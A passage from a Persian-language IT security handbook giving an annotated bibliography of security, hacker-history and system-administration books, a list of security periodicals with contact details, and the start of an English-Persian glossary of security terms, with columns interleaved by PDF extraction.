‫ﻳﻚ ﻛﺘﺎﺏ ﺁﻣﻮﺯﺷـﻲ ﻋـﺎﻟﻲ ﻛـﻪ ﺑـﺎ ﺟﺰﺋﻴـﺎﺕ ﺭﻭﺷـﻦ ﺑـﻪ ﺷـﻤﺎ‬
‫ﻓﻬﺮﺳﺖ ﺟﺎﻣﻌﻲ ﺍﺯ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ‬ :‫ﻣﻲﺁﻣﻮﺯﺩ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﻮﺩ ﺭﺍ ﺑﺴﺎﺯﻳﺪ‬
‫ ﺍﻳـﻦ‬.‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﺑـﺼﻮﺭﺕ ﺗﺠـﺎﺭﻱ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻫـﺴﺘﻨﺪ‬
Chapman, D. Brent, and Elizabeth D.
‫ ﺑﺎ ﻋﻀﻮﻳﺖ ﺩﺭ ﻣﺆﺳﺴﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﺭﺍﻳﮕﺎﻥ ﻣﻲﺑﺎﺷﺪ‬،‫ﻓﻬﺮﺳﺖ‬ Zwicky. Building Internet Firewalls.
:(http://www.gocsi.com ‫)ﻭ ﺁﺩﺭﺱ ﻭﺏ ﺁﻥ ﻫﻢ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ‬ Sebastopol, CA: O’Reilly & Associates, 2nd
edition, 2000.
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٥٠٠‬‬

‫‪Littman, Jonathan, The Fugitive Game:‬‬ ‫‪Computer Security Buyer’s Guide, Computer‬‬
‫‪Online with Kevin Mitnick. Boston, MA: Little,‬‬ ‫‪Security Institute, San Francisco, CA.‬‬
‫‪Brown, 1996.‬‬ ‫)‪(Order from CSI, 415-905-2626‬‬

‫ﺩﺭ ﺭﻭﺯ ﻛﺮﻳــﺴﻤﺲ ﺳــﺎﻝ ‪ ،۱۹۹۴‬ﻳــﻚ ﻣﻬــﺎﺟﻢ ﺑــﻪ ﺭﺍﻳﺎﻧــﻪ‬ ‫ﺩﺭﻙ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫‪ Shimora‬ﻧﻔﻮﺫ ﻛﺮﺩ‪ .‬ﭼﻨﺪ ﻫﻔﺘﻪ ﺑﻌـﺪ ﺍﺯ ‪ Shimora‬ﺧﻮﺍﺳـﺘﻪ‬
‫ﺷﺪ ﻛـﻪ ﺩﺭ ﻣﺠﻤﻮﻋـﻪ ﺣﻤﻼﺗـﻲ ﻛـﻪ ﺑـﻪ ﭼﻨـﺪ ﻣﺮﻛـﺰ ‪ ISP‬ﺩﺭ‬ ‫ﺗﻤﺎﻣﻲ ﻣﺮﺍﺟﻊ ﺯﻳﺮ‪ ،‬ﺟﻨﺒﻪﻫﺎﻳﻲ ﺍﺯ ﺁﻳﻨﺪﺓ ﺷﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ‬
‫ﺳﺎﻥﻓﺮﺍﻧﺴﻴﺴﻜﻮ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺩﺭ ﻧﻬﺎﻳـﺖ‪ ،‬ﺭﺩ ﻣﻬـﺎﺟﻢ‬ ‫ﺗﺸﺮﻳﺢ ﻣﻲﻧﻤﺎﻳﻨﺪ ﻭ ﺑﻴﺸﺘﺮ ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺭﻣﺰﺷﻜﻨﻬﺎ ﻣـﻮﺭﺩ ﺑﺤـﺚ‬
‫ﺑﻪ ﻛﺎﻟﻴﻔﺮﻧﻴﺎﻱ ﺷﻤﺎﻟﻲ ﺭﺳـﻴﺪ ﻭ ﺍﺩﺍﻣـﺔ ﺗﺤﻘﻴﻘـﺎﺕ ﺑـﻪ ﺗﻌﻘﻴـﺐ ﻭ‬ ‫ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﺩﺳﺘﮕﻴﺮﻱ ‪ Kevin Mitnick‬ﻣﻨﺠﺮ ﺷﺪ‪ .‬ﺍﻳـﻦ ﺩﺍﺳـﺘﺎﻧﻲ ﺍﺳـﺖ‬
‫ﻛﺘﺎﺑﻲ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﺨﺘﻠـﻒ ﻧﻔـﻮﺫﮔﺮﺍﻥ‬
‫ﻛﻪ ﺗﻮﺳﻂ ‪ Shimora‬ﻭ ‪) Markoff‬ﺭﻭﺯﻧﺎﻣﻪ ﻧﮕﺎﺭ ﺭﻭﺯﻧﺎﻣﺔ ﻧﻴﻮﻳﻮﺭﻙ‬
‫ﺍﺳﺘﺮﺍﻟﻴﺎﻳﻲ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺩﺍﺳـﺘﺎﻧﻬﺎﻱ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺻـﺤﺖ ﻧﺪﺍﺭﻧـﺪ‪،‬‬
‫ﺗﺎﻳﻤﺰ ﻛﻪ ﺍﺯ ﻣﺎﺟﺮﺍﻱ ﺩﺳﺘﮕﻴﺮﻱ ﮔﺰﺍﺭﺵ ﺗﻬﻴﻪ ﻛﺮﺩﻩ( ﺩﺭ ﻛﺘﺎﺏ ﺯﻳﺮ ﺷـﺮﺡ‬
‫ﭼﺮﺍﻛﻪ ﻧﻮﻳﺴﻨﺪﻩ ﻧﺘﻮﺍﻧـﺴﺘﻪ ﺑـﺎ ﺗﻤـﺎﻡ ﻗﺮﺑﺎﻧﻴـﺎﻥ ﺗﻤـﺎﺱ ﺑﮕﻴـﺮﺩ ﻭ‬
‫ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺻﺤﺖ ﻭ ﺳﻘﻢ ﻣﻄﻠﺐ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ‪:‬‬
‫‪Shimomura, Tsutomu, with John Markoff.‬‬
‫‪Dreyfus, Suelette. Underground; Australia,‬‬
‫‪Takedown: The Pursuit and Capture of‬‬
‫‪Reed Books, 1997.‬‬
‫‪Kevin Mitnick, America’s Most Wanted‬‬
‫‪Computer Outlaw—By the Man Who Did It.‬‬
‫‪NewYork, NY: Hyperion, 1995.‬‬ ‫ﻛﺘﺎﺑﻲ ﻛﻪ ﺗﻮﺳﻂ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻋﻠﻤﻲ ‪ -‬ﺗﺨﻴﻠﻲ ﺑﻪ ﺭﺷـﺘﺔ ﺗﺤﺮﻳـﺮ‬
‫ﺩﺭﺁﻣﺪ ﻭ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﻛﻠﻤﺔ "ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ" ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩﻩ ﺑﻮﺩ‪:‬‬
‫‪Sterling, Bruce. The Hacker Crackdown:‬‬
‫‪Law and Disorder on the Electronic Frontier.‬‬
‫‪Gibson, William. Burning Chrome,‬‬
‫‪Neuromancer, Count Zero, Mona Lisa‬‬
‫ﻛﺘــﺎﺏ ﻓــﻮﻕ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ ﻣﺘﻌــﺪﺩﻱ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﻗﺎﺑــﻞ‬ ‫‪Overdrive, Virtual Light, Idoru, All‬‬
‫ﺩﺳﺘﺮﺳــﻲ ﺍﺳــﺖ‪ ،‬ﺍﺯ ﺟﻤﻠــﻪ ﺩﺭ ﻓﻬﺮﺳــﺘﻬﺎﻱ ‪ ،COAST‬ﻭ ﻧﻴــﺰ‬ ‫‪Tomorrow’s Parties. New York, NY: Bantam‬‬
‫‪Books Cyberpunk.‬‬
‫ﺁﺩﺭﺱ ﺯﻳﺮ‪:‬‬
‫‪http://www.swiss.ai.mit.edu/~bal/sterling/con‬‬ ‫‪،Kevin‬‬ ‫)‪Mitrick‬‬‫ﻛﺘــﺎﺑﻲ ﻛــﻪ ﺩﺍﺳــﺘﺎﻧﻬﺎﻳﻲ ﺍﺯ ﺳـــﻪ ﻧﻔـﻮﺫﮔـــﺮ‬
‫‪tents.html‬‬
‫‪ ،Pengo‬ﻭ ‪ (Robert.T.Morris‬ﺭﺍ ﺑﺎﺯﮔﻮﻳﻲ ﻣﻲﻛﻨﺪ‪:‬‬
‫ﻳﻚ ﻣﺎﺟﺮﺍﻱ ﺧﻮﺍﻧﺪﻧﻲ ﺍﺯ ﺗﻌﻘﻴﺐ ﻳﻚ ﻣﻬﺎﺟﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺯ ﻃﺮﻳﻖ‬
‫‪Hafner, Katie and John Markoff, Cyberpunk:‬‬
‫ﺷﺒﻜﻪ‪ .‬ﺑﻌﺪﻫﺎ ﻣﺸﺨﺺ ﺷـﺪ ﻛـﻪ ﺍﻳـﻦ ﻣﻬـﺎﺟﻢ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻥ‬ ‫‪Outlaws and Hackers on the Computer‬‬
‫‪ KGB‬ﻛﺎﺭ ﻣﻲﻛﺮﺩﻩ ﻭ ﺗﻼﺵ ﻭﻱ ﺑـﺮ ﺁﻥ ﺑـﻮﺩﻩ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ‬ ‫‪Frontier. New York, NY: Simonand Schuster,‬‬
‫‪1991.‬‬
‫ﺣﺴﺎﺱ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺪﺯﺩﺩ‪:‬‬
‫ﻳﻜﻲ ﺍﺯ ﻛﺘﺎﺑﻬﺎﻱ ﺍﻭﻟﻴـﻪ ﻛـﻪ ﺑـﻪﺗـﺸﺮﻳﺢ ﭘﺎﻳﺒﻨـﺪﻳﻬﺎ ﻭ ﺍﻋﺘﻘـﺎﺩﺍﺕ‬
‫‪Stoll, Cliff. The Cuckoo’s Egg, Garden City,‬‬
‫‪NY: Doubleday, 1989.‬‬ ‫ﺍﺧﻼﻗﻲ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻲﭘﺮﺩﺍﺯﺩ‪:‬‬

‫‪Varley, John. “Press” Enter.‬‬ ‫‪Levy, Steven. Hackers: Heroes of the‬‬


‫‪Computer Revolution. New York, NY: Dell‬‬
‫ﻣﻄﻠﺐ ﻓﻮﻕ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﻋﻠﻤـﻲ ‪ -‬ﺗﺨﻴﻠـﻲ ﺑـﻪ‬ ‫‪Books, 1984.‬‬
‫ﭼﺎﭖ ﻣﺠﺪﺩ ﺭﺳﻴﺪﻩ ﻛﻪ ﺍﺯ ﺟﻤﻠﺔ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑـﻪ ﺩﻭ ﻣـﻮﺭﺩ ﺯﻳـﺮ‬
‫ﻛﺘﺎﺑﻲ ﻛﻪ ﻧﻮﻳـﺴﻨﺪﺓ ﺁﻥ ﻳﻜـﺴﺎﻝ ﻗﺒـﻞ ﺍﺯ ﺩﺳـﺘﮕﻴﺮﻱ ﺩﺭ ﺳـﺎﻝ‬
‫ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪:‬‬
‫‪ ۱۹۹۵‬ﮔﻔﺘﮕﻮﻫﺎﻱ ﺗﻠﻔﻨﻲ ﺑﺴﻴﺎﺭﻱ ﺑﺎ ‪ Kevin Mitnick‬ﺩﺍﺷـﺘﻪ‬
‫‪Blue Champagne, Ace Books, 1986; Isaac‬‬ ‫ﻭ ﻃﻲ ﺁﻧﻬﺎ ﺁﻣﻮﺧﺘﻪ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫;‪Asimov’s Science Fiction Magazine, 1984‬‬ ‫ﺗﺒﺪﻳﻞ ﺷﺪ‪ ،‬ﻭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻴﺰ ﺩﺍﺳﺘﺎﻥ ﻫﻤﻴﻦ ﻣﺎﺟﺮﺍ ﺍﺳﺖ‪:‬‬
٥٠١ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ ﻳﻚ ﻧﻴﺎﺯ ﺍﺳﺎﺳﻲ ﺑﺮﺍﻱ‬.Perl ‫ﻣﺮﺟﻊ ﺍﺻﻠﻲ ﺯﺑﺎﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ‬ Tor SF Doubles, October, TorBooks, 1990.
sed ‫ ﻭ ﻳــﺎ‬،awk ،shell ‫ﻫﻤــﺔ ﻛــﺴﺎﻧﻲ ﻛــﻪ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ‬
Vinge, Vernor. True Names and Other
‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻣﻲﻛﻨﻨﺪ ﻭ ﻳـﺎ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﺑـﻪ ﺳـﺮﻋﺖ ﻧﻮﺷـﺘﻦ‬ Dangers. New York,NY: Baen, distributed by
:‫ ﺭﺍ ﻓﺮﺍ ﺑﮕﻴﺮﻧﺪ‬Unix ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ ﻣﺤﻴﻂ‬ Simon & Schuster, 1987.

Wall, Larry, Christiansen, Tom, and Orwant, Unix ‫ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬


Jon. Programming perl, 3rd edition,
Sebastopol, CA: O’Reilly & Associates,
2000. ‫ﻳﻚ ﻣﺮﺟﻊ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ‬
:DNS ‫ﻧﺎﻡ‬
Windows ‫ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
Albitz, Paul and Cricket Liu. DNS and BIND.
Sebastopol, CA: O’Reilly & Associates, 4th
‫ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﻭ ﻫﻤﻜـﺎﺭﺍﻥ ﻣﺠﻤﻮﻋـﻪ ﻛﺘﺎﺑﻬـﺎﻱ ﻣﻔﻴـﺪﻱ ﺩﺭ‬ edition, 2001.
‫ ﺍﺯ ﺟﻤﻠﻪ ﻛﺘـﺎﺏ‬،‫ ﺩﺍﺭﺩ‬Windows ‫ﺯﻣﻴﻨﺔ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
:‫ﻛﺘﺎﺑﻬﺎﻱ ﺯﻳﺮ‬ :"ksh" ‫ﻳﻚ ﻛﺘﺎﺏ ﻛﺎﻣﻞ ﺁﻣﻮﺯﺷﻲ ﻭ ﻣﺮﺟﻌﻲ ﺑﺮﺍﻱ ﭘﻮﺳﺘﺔ‬

Windows NT TCP/IP Network Administration Bolsky, Morris I., and David G. Korn. The
(Craig Hunt and RobertBruce Thompson, 1998). New Kornshell Command and Programming
Language. Englewood Cliffs, NJ: Prentice-
Managing the Windows 2000 Registry Hall, 2nd edition, 1995.
(Robichaux, 2000).
‫ ﻭ‬Unix ‫ﻳﻚ ﺭﺍﻫﻨﻤﺎﻱ ﺧﻮﺏ ﺩﺭ ﻣﻮﺭﺩ ﺭﻭﺡ ﻛﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ‬
DHCP for Windows 2000 (Neall Alcott, 2001). ‫ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﭘﻮﺳـﺘﻪ ﻭ‬،‫ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧـﻪ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﺁﻥ‬
DNS on Windows 2000, 2nd Edition (Matt :‫ﻣﺤﻴﻂﻫﺎﻱ ﺩﺳﺘﻮﺭﻧﻮﻳﺴﻲ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‬
Larson and Cricket Liu, 2001).
Kernighan, Brian, Dennis Ritchie and Rob
Windows 2000 Administration in a Nutshell Pike. The UNIX Programming Environment.
(Mitch Tulloch, 2001). Englewood Cliffs, NJ: Prentice-Hall, 1984.

:‫ﻭ ﻧﻬﺎﻳﺘﹰﺎ‬ ‫ﻳﻚ ﻣﺮﺟﻊ ﺑﺴﻴﺎﺭ ﺧـﻮﺏ ﺩﺭ ﻣـﻮﺭﺩ ﻣﺰﺍﻳـﺎ ﻭ ﻣﻌﺎﻳـﺐ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ‬.Unix ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
Windows Server 2003 in a Nutshell (Mitch
Tulloch, 2003).
‫ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‬،‫ ﺍﻓﺰﻭﺩﻥ ﻭ ﺣﺬﻑ ﻛـﺎﺭﺑﺮﺍﻥ‬،‫ﻧﺤﻮﺓ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ‬
‫ ﺗﻬﻴﺔ ﻧـﺴﺨﻪﻫـﺎﻱ‬،‫ﺳﻴﺴﺘﻢ ﺣﺴﺎﺑﺪﺍﺭﻱ ﺑﺮﺍﻱ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﮔﺎﻫﻨﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬ ‫ ﻭ ﻧﻴـﺰ‬sendmail ‫ ﺭﺍﻩ ﺍﻧـﺪﺍﺯﻱ‬،‫ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷـﺒﻜﻪﻫـﺎ‬،‫ﭘﺸﻴﺒﺎﻥ‬
:‫ﻼ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‬ ‫ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺍﺳﺖ ﻭ ﺧﻮﺍﻧﺪﻥ ﺁﻥ ﻛﺎﻣ ﹰ‬
Computer Audit Update
Computer Fraud & Security Update
Computer Law & Security Report Nemeth, Evi, Garth Snyder, Scott Seebass,
Computers & Security and Trent R. Hein. UNIX System
Administration Handbook, 3rd Edition.
‫ﺑﺨﺶ ﺷﺸﻢ‬

Elsevier Advanced Technology Englewood Cliffs, NJ: Prentice-Hall, 2000.


Crown House, Linton Rd.
Barking, Essex I611 8JU
England Welsh, Matt, Kaufman, Lar, Dalheimer,
Voice: +44-81-5945942 Matthias K., and Dawson, Terry. Running
Fax: +44-81-5945942 Linux, 4th edition. Sebastopol, CA: O’Reilly
Telex: 896950 APPSCI G
& Associates, 2002.
North American Distributor:
P.O. Box 882
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٥٠٢

+1 314-894-0276 New York, NY 10159


http://www.drj.com Voice: +1-212-989-5800
http://www.elsevier.nl/catalogue/
InfoSecurity News
Computer Security Alert
West Coast Publishing, Inc. Computer Security Journal
161 Worcester Road, Suite 201 Computer Security Buyers Guide
Framingham, MA 01701
http://www.scmagazine.com Computer Security Institute
600 Harrison Street
Information Security San Francisco, CA 94107
Voice: +1-415-905-2626
http://www.gocsi.com
85 Astor Ave, Suite 2
Norwood, MA 02062
http://www.infosecuritymag.com Disaster Recovery Journal

PO Box 510110
St. Louis, MO 63151
‫ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ‬

Acceptable Use Policy ...................................................................... ‫ﺳﻴﺎﺳﺖ ﮐﺎﺭﺑﺮﺩ ﻣﺠﺎﺯ‬

Access ....................................................................................................................... ‫ﺩﺳﺘﺮﺳﻲ‬

Access Control ........................................................................................... ‫ﮐﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ‬

Access Control List .....................................................................‫ﻓﻬﺮﺳﺖ ﮐﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ‬

Acknowledgement Information ....................................................... ‫ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻘﻲ‬

Anonymity .................................................................................................................. ‫ﮔﻤﻨﺎﻣﻲ‬

Answerback Modes ....................................................................................... ‫ﺣﺎﻻﺕ ﺑﺎﺯﮔﻮ‬

Attack ..............................................................................................................................‫ﺗﻬﺎﺟﻢ‬

Attestation Report ...................................................................................... ‫ﮔﺰﺍﺭﺵ ﺗﺼﺪﻳﻖ‬

Audit ............................................................................................................................... ‫ﻣﻤﻴﺰﻱ‬

Audit Trail ......................................................................................................... ‫ﺳﻠﺴﻠﺔ ﻣﻤﻴﺰﻱ‬

Authentic Signature ...................................................................................... ‫ﺍﻣﻀﺎﻱ ﻣﻌﺘﺒﺮ‬

Authentication ................................................................................................ ‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬

Authorization ....................................................................................................... ‫ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ‬

Availability ................................................................................................... ‫ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ‬

Backbone ..................................................................................................................... ‫ﺷﺎﻫﺮﺍﻩ‬

Backdoor .............................................................................................................. ‫ﺩﺭﺏ ﻣﺨﻔﻲ‬

Backup ....................................................................................................................... ‫ﭘﺸﺘﻴﺒﺎﻥ‬

Best Practices .......................................................................................... ‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‬

Biometric ....................................................................................................... ‫ﻣﺸﺨﺼﺔ ﺯﻳﺴﺘﻲ‬

Blackbox Testing ..................................................................................... ‫ﺁﺯﻣﻮﻥ ﺟﻌﺒﻪ ﺳﻴﺎﻩ‬

Blended Threat ......................................................................................... ‫ﺗﻬﺪﻳﺪ ﭼﻨﺪﻭﺟﻬﻲ‬

Block Algorithms ..................................................................................‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺑﻠﻮﮐﻲ‬

Break-In Plan ........................................................................................................ ‫ﻃﺮﺡ ﻧﻔﻮﺫ‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٥٠٤

Broadcast ................................................................................................................ ‫ﻋﺎﻡ ﮔﺴﺘﺮ‬

Buffer Overflow ............................................................................................... ‫ﺳﺮﺭﻳﺰﻱ ﺑﺎﻓﺮ‬

Business Continuity Plan .......................................................... ‫ﻃﺮﺡ ﺗﺪﺍﻭﻡ ﮐﺴﺐ ﻭ ﮐﺎﺭ‬

Cache ..................................................................................................................... ‫ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‬

Cache Poisoning ............................................................................ ‫ﺁﻟﻮﺩﻩﮐﺮﺩﻥ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‬

Call Forwarding ............................................................................................. ‫ﻫﺪﺍﻳﺖ ﺗﻤﺎﺱ‬

Certificate Revocation Lists ................................................. ‫ﻓﻬﺮﺳﺖ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ‬

Certification ............................................................................................................. ‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪ‬

Certification Authorities .................................................................... ‫ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬

Certification Practices Statement ........................................... ‫ﺳﻴﺎﺳﺖ ﮐﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ‬

Checklist .......................................................................................................... ‫ﻓﻬﺮﺳﺖ ﮐﻨﺘﺮﻝ‬

Checksum .................................................................................................................. ‫ﺳﺮﺟﻤﻊ‬

Clear Text ................................................................................................................. ‫ﻣﺘﻦﺳﺎﺩﻩ‬

Client ................................................................................................................. ‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‬

Clogging ........................................................................................................... ‫ﺣﻤﻼﺕ ﺍﻧﺴﺪﺍﺩ‬

Collision ......................................................................................................................... ‫ﺗﻼﻗﻲ‬

Command-Line Interpreter ................................................................. ‫ﻣﻔﺴﺮ ﺧﻂ ﻓﺮﻣﺎﻥ‬

Compliance Audit Policy ............................................................. ‫ﻣﻤﻴﺰﻱ ﺭﻋﺎﻳﺖ ﺳﻴﺎﺳﺖ‬

Compromise ............................................................................................................... ‫ﺗﺴﺨﻴﺮ‬

Computer Crime ........................................................................................... ‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‬

Computer Emergency Response Team ................ ‫ﻣﺮﮐﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬

Computer Incident Response Centers ........... ‫ﻣﺮﮐﺰ ﻭﺍﮐﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‬

Confidentiality ...................................................................................................... ‫ﻣﺤﺮﻣﺎﻧﮕﻲ‬

Consistency ................................................................................. (‫ﭘﺎﻳﺪﺍﺭﻱ )ﺛﺒﺎﺕ ﻭ ﺳﺎﺯﮔﺎﺭﻱ‬

Countermeasure ............................................................................................‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺧﻄﺮ‬

Cracker ........................................................................................................................ ‫ﺧﺮﺍﺑﮑﺎﺭ‬

Critical Infrastructures ....................................................................... ‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ‬

Cryptography ........................................................................................................ ‫ﺭﻣﺰﻧﮕﺎﺭﻱ‬


‫‪٥٠٥‬‬ ‫ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ‬

‫ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ )ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ( ‪Cyberspace ..............................................................................‬‬

‫ﺣﻤﻼﺕ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ‪Data-Driven Attacks .............................................................‬‬

‫ﮐﺪﮔﺸﺎﻳﻲ ‪Decode .....................................................................................................................‬‬

‫ﺭﻣﺰﮔﺸﺎﻳﻲ ‪Decrypt ....................................................................................................................‬‬

‫ﺩﻓﺎﻉ ﺩﺭ ﻋﻤﻖ ‪Defense in Depth ..........................................................................................‬‬

‫ﻧﺎﺣﻴﺔ ﻏﻴﺮﻧﻈﺎﻣﻲﺷﺪﻩ‪Demilitarized Zone .............................................................................‬‬

‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪Denial of Service .......................................................................................‬‬

‫ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ‪Digital Signature .......................................................................................‬‬

‫ﻃﺮﺡ ﺗﺮﻣﻴﻢ ﺳﺎﻧﺤﻪ ‪Disaster Recovery Plan .....................................................................‬‬

‫ﺻﺎﻓﻴﻬﺎﻱ ﺧﺮﻭﺟﻲ ‪Egress Filters ...........................................................................................‬‬

‫ﮔﻮﺍﻫﻲ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ‪Electronic Certification .......................................................................‬‬

‫ﺑﻤﺐ ﭘﺴﺘﻲ ‪Email Bomb .........................................................................................................‬‬

‫ﮐﺪﮔﺬﺍﺭﻱ‪Encoding ..................................................................................................................‬‬

‫ﺭﻣﺰﮔﺬﺍﺭﻱ‪Encryption ...............................................................................................................‬‬

‫ﮐﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪Encryption Key ............................................................................................‬‬

‫ﺍﻣﻨﻴﺖ ﺍﻧﺘﻬﺎ ﺑﻪ ﺍﻧﺘﻬﺎ ‪End-to-End Security ............................................................................‬‬

‫ﺭﺷﺘﻪﻫﺎﻱ ﻓﺮﺍﺭ ‪Escape Sequences .....................................................................................‬‬

‫ﺷﺒﮑﺔ ﺧﺎﺭﺟﻲ ‪Extranet ..............................................................................................................‬‬

‫ﻣﺨﺎﻃﺮﺓ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ‪E-Risk .......................................................................................................‬‬

